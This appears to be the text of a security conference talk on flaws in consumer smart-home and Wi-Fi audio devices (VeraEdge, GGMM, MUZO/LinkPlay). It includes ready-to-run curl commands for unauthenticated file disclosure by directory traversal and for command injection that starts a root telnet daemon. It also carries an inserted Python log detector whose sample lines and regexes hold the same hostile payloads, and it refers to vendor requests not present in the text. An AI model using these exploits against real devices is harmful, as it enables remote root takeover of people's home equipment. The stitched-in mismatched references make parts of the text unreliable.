Reliable Wireless Technology." 
VeraEdge-US Smart Home Controller LFD 


• Local File Disclosure via store_file.sh and get_file.sh, both of which can be hit without authentication 

• From here, store_file and get_file can be leveraged to extract data 

• get_file requires a directory to exist, which store_file conveniently creates 

• curl -X POST -v 'http://192.168.1.130/cgi-bin/cmh/store_file.sh' --data store_file=123 

• curl -X POST -v 'http://192.168.1.130/cgi-bin/cmh/get_file.sh' --data filename="../../../../../etc/cmh/cmh.conf" 

• Plus SSH key files for connecting back to the Vera Servers, and support users to scp files encrypted with a static key (also in the box!) 









VeraEdge-US Smart Home Controller Root 


• "get_file.sh" can return any file on the system utilizing directory traversal 







GGMM E3 Smart Speaker 


Smart Speaker 

Uses WiFi for Internet Radio 

• Pandora 

• Spotify 

• IHeartRadio 

• Etc.. 

Features an Android App 




GGMM E3 Smart Speaker 

• "Reversed" the Android App 

• Found update procedure 

• Obtained and extracted firmware 

• Identified potential vulnerability in "rootApp" 

• iwpriv ra0 set Key1=%s 

• This can be accessed pre-authenticated via "httpapi.asp" 







GGMM E3 Smart Speaker RCE 


• curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738; /usr/sbin/telnetd; :chext=0' --compressed 

• Via new Telnet daemon, root - preauth remote command execution as root 







MUZO Cobblestone Wi-Fi Audio Receiver 

• Smart Audio Streamer 

• Uses WiFi for Audio Streaming 

• "Stream Music From Phone, 

Airplay, NAS, Multi-room. Make 
Your Speakers Wireless" 






MUZO Cobblestone Wi-Fi Audio Receiver 

• Thursday Fry's Run (When we also got the Doorbell) 

• Hooray for the Las Vegas Fry's! 

• Low quality electronics at high quality prices 

• Needed to confirm a hypothesis... 

• Oddly enough, nmap had an open Telnet server 

• admin/admin for root access - but ignore that for now 






MUZO Cobblestone Wi-Fi Audio Receiver 


• curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738; /usr/sbin/telnetd; :chext=0' --compressed 

• Telnet, and root - preauth command injection 

(yes, it's the same slide) 
MUZO Cobblestone Wi-Fi Audio Receiver 


• It's the same bug... different "manufacturer" 

• Looks like most of these use a "Turn Key WiFi Solution" called LinkPlay 

• Remember that app reversing? 

• http://fwupdate.wiimu.com:8020/wifi_audio_image_v2/products.xml 

• Also all http and unsigned, lots of easy MITM for root... but ignore that 

• 96 unique models 

• 7 hardware revisions 

• At a glance, many appear to also be affected by this RCE 

• 35 products listed on the "LinkPlay/WiiMu" page alone 
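Across the deck the remote bugs share a delivery shape: an HTTP form field carrying a shell metacharacter or a CR/LF, a `../` path, a telnetd spawn, or a known privilege-resetting endpoint. The following is an added example, not from the talk: a small request-level checker for those shapes, run over a handful of constructed log lines modelled on the Tenvis, D-Link, WD MyCloud and Vera requests shown in these slides. The log line format, client addresses and field names are constructed for the example; form parsing is done by hand so the checker behaves the same on every Python version.

```python
# Added example: flagging the request shapes seen in this deck.
import re
from urllib.parse import unquote_plus

# Indicator patterns, checked against each decoded form value separately.
INDICATORS = {
    "metachar-or-control-in-field": re.compile(r"[;|`]|\$\(|[\r\n]"),
    "spawns-telnetd": re.compile(r"\btelnetd\b"),
    "path-traversal": re.compile(r"(^|/)\.\.(/|$)"),
}

# Request shapes that are themselves the indicator: the WD MyCloud wto reset.
KNOWN_ENDPOINTS = [
    ("network_mgr.cgi", {"cmd": "cgi_get_ipv6", "flag": "1"}),
]


def form_fields(data: str) -> list:
    """Split application/x-www-form-urlencoded data on '&' only, then decode
    each key and value once.  Splitting before decoding keeps an encoded '&'
    or ';' inside the value it was sent in."""
    fields = []
    for pair in data.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields.append((unquote_plus(key), unquote_plus(value)))
    return fields


def scan_request(path: str, query: str = "", body: str = "") -> list:
    """Return the indicator names fired by one request, in a stable order."""
    hits = []
    fields = form_fields(query) + form_fields(body)
    for _, value in fields:
        for label, rx in INDICATORS.items():
            if rx.search(value) and label not in hits:
                hits.append(label)
    params = dict(fields)
    for endpoint, required in KNOWN_ENDPOINTS:
        if path.endswith(endpoint) and all(params.get(k) == v for k, v in required.items()):
            hits.append("wto-session-reset:" + endpoint)
    return hits


# Constructed log lines: "<client> <method> <path>[?query] <body or ->".
SAMPLE_LOG = [
    "10.0.0.5 POST /cgi-bin/hi3510/param.cgi cmd=setwirelessattr&-wf_ssid=HomeNet&-wf_key=correcthorse",
    "10.0.0.9 POST /eng/admin/adv_wireless.cgi wireless=1&ssid=a;telnetd%20-l%20/bin/sh%26&mode=0",
    "10.0.0.9 GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1 -",
    "10.0.0.7 POST /cgi-bin/cmh/get_file.sh filename=../../../../../etc/cmh/cmh.conf",
]


def scan_log(lines) -> dict:
    """Map 1-based line number -> (client, hits) for every line that fired."""
    findings = {}
    for n, line in enumerate(lines, 1):
        client, _method, target, body = line.split(" ", 3)
        path, _, query = target.partition("?")
        hits = scan_request(path, query, "" if body == "-" else body)
        if hits:
            findings[n] = (client, hits)
    return findings


if __name__ == "__main__":
    for n, (client, hits) in scan_log(SAMPLE_LOG).items():
        print("line %d from %s: %s" % (n, client, ", ".join(hits)))
```

Checking decoded fields one at a time, rather than the raw request line, is what lets a single rule catch the Tenvis `%0A`/`%0D` case and the D-Link `%20` case alike; a proxy or the device's own CGI front end can apply the same rules before the request reaches the vulnerable handler.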
LinkPlay Devices 
















Demo 
Thank You 







Questions 